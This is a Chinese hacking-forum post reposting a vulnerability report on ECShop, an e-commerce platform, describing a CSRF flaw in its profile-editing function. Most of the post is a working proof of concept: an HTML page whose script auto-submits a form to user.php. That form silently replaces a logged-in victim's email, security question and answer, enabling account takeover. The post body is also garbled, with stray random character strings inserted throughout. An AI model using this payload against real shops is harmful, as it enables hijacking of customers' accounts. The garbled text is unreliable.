找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1823|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:
  d& g+ y" o) b1 n1 c( ~6 F% E' Mecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
1 L5 s3 T0 v+ r' w- q$ r+ n9 x) r2 @7 M8 Y, H- ]8 B
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
- ]" j* ^# n# k
# B" p3 K/ F# \5 i- G' m详细说明:
0 o% O# U- v- h, v& q+ y! e4 }$ Q) z# E利用csrf和xss可以突破官方所说的“障碍”; b: u0 B) i" X5 ]; @1 S
xss版本已经有人说明9 x5 S* o/ L0 p
这里给出csrf版本
8 q5 \: o! @3 H6 W4 K' A. u
4 y, ^4 o7 J* L漏洞证明:' @8 f& q. y! c
<html>
2 R, _  L) }% ~, v<body>/ T4 O, B# w& A9 v. u3 t
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
% G4 e! u+ i& T<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
7 J, D$ z0 m/ U) p<INPUT TYPE="text" NAME="act" value="act_edit_profile">( L& w0 e' y9 c$ d4 R) v
<INPUT TYPE="text" NAME="sel_question" value="ecshop">9 L) \  K5 n! G) T2 q
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">$ ^* d$ h& y) K8 N
</body>
: j( }. [+ c! S# \5 \3 ~" j<script>: k6 y2 E; k% P0 d3 @
document.forms[0].submit();. Y/ u8 e9 u) P$ z6 x- m0 |9 s, u  J: y
</script>
% B3 O. c" O+ _: Y# [7 `5 c</html>1 n6 b8 ?- [+ U& q
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失! n& \" x/ ~- A
1 p% F0 r/ K: y. L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表